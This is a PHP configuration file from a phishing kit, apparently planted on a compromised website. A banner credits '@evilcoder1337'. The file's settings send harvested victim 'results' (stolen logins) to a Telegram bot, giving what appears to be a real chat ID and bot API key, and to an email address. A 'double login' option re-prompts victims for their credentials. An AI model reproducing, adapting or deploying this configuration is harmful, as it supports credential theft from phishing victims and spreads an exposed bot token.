| Current File : /home/missente/public_html/cKlZG/upgrades/index/settings.php |
<?php
/*
██████████ ███████ █████████ █████ █████ ████████
░░███░░░░░█ ░░░░░███ ███░░░░░███ ███░░░███ ░░███ ███░░░░███
░███ █ ░█████ ████████░███ ███ ░░░ ███ ░░███ ███████░░░ ░██████████
░██████ ░░███ ░░██░░███░███ ░███ ░███ ░██████░░███ ██████░░███░░███
░███░░█ ░███ ░███░███░███ ░███ ░███ ░██░███ ░███ ░░░░░░██░███ ░░░
░███ ░ ░░███ ███ ░███░███ ░░███ ██░░███ ███░███ ░███ ███ ░██░███
██████████░░█████ █████████ ░░█████████ ░░░█████░ ░░███████░░█████████████
░░░░░░░░░░ ░░░░░ ░░░░░░░░░ ░░░░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░░░░░░░░░
ICQ & TELEGRAM : @evilcoder1337
*/
// ================================= //
$show_error_login= "yes"; // yes = on and no = off , turn it on if u want it to show error page or double login.
/* SEND RESULT TO TELEGRAM BOT HERE */
$sendtotelegram="yes"; // If You Want to result on Telegram put yes otherwise put no
$chat_id = "8210909827"; // Your Telegram Chat ID
$bot_url = "8647432298:AAFwrdVSK3qRVifygoxMIAN8TuHT9wwPx_g"; // Your Telegram Bot Api Key
/* SEND RESULT TO EMAIL */
$to = "test@Mail.com"; //Your email here //
?>